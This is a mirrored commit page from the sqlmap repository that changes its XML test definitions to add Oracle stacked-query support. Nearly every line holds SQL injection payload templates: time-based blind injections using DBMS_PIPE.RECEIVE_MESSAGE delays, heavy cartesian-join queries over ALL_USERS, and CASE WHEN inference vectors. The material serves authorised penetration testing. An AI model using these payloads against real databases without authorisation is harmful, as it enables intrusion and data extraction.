mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-23 01:56:36 +03:00
added stacked query support for Oracle
This commit is contained in:
parent
4bb40c0a06
commit
7e2984b4b6
|
@ -1344,15 +1344,15 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle stacked queries (BEGIN DBMS_LOCK.SLEEP)</title>
|
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
|
||||||
<stype>4</stype>
|
<stype>4</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>0</clause>
|
<clause>0</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector></vector>
|
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
|
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME]) FROM DUAL;</payload>
|
||||||
<comment>--</comment>
|
<comment>--</comment>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
|
@ -1364,39 +1364,19 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle stacked queries (EXEC DBMS_LOCK.SLEEP)</title>
|
<title>Oracle stacked queries (heavy query)</title>
|
||||||
<stype>4</stype>
|
<stype>4</stype>
|
||||||
<level>5</level>
|
<level>5</level>
|
||||||
<risk>0</risk>
|
<risk>0</risk>
|
||||||
<clause>0</clause>
|
<clause>0</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector></vector>
|
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00);</payload>
|
<payload>; SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5;</payload>
|
||||||
<comment>--</comment>
|
<comment>--</comment>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[SLEEPTIME]</time>
|
<time>[DELAYED]</time>
|
||||||
</response>
|
|
||||||
<details>
|
|
||||||
<dbms>Oracle</dbms>
|
|
||||||
</details>
|
|
||||||
</test>
|
|
||||||
|
|
||||||
<test>
|
|
||||||
<title>Oracle stacked queries (BEGIN USER_LOCK.SLEEP)</title>
|
|
||||||
<stype>4</stype>
|
|
||||||
<level>5</level>
|
|
||||||
<risk>0</risk>
|
|
||||||
<clause>0</clause>
|
|
||||||
<where>1</where>
|
|
||||||
<vector></vector>
|
|
||||||
<request>
|
|
||||||
<payload>; EXEC USER_LOCK.SLEEP([SLEEPTIME].00);</payload>
|
|
||||||
<comment>--</comment>
|
|
||||||
</request>
|
|
||||||
<response>
|
|
||||||
<time>[SLEEPTIME]</time>
|
|
||||||
</response>
|
</response>
|
||||||
<details>
|
<details>
|
||||||
<dbms>Oracle</dbms>
|
<dbms>Oracle</dbms>
|
||||||
|
@ -1572,9 +1552,9 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
|
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
|
@ -1751,9 +1731,9 @@ Formats:
|
||||||
<risk>4</risk>
|
<risk>4</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
|
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
|
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user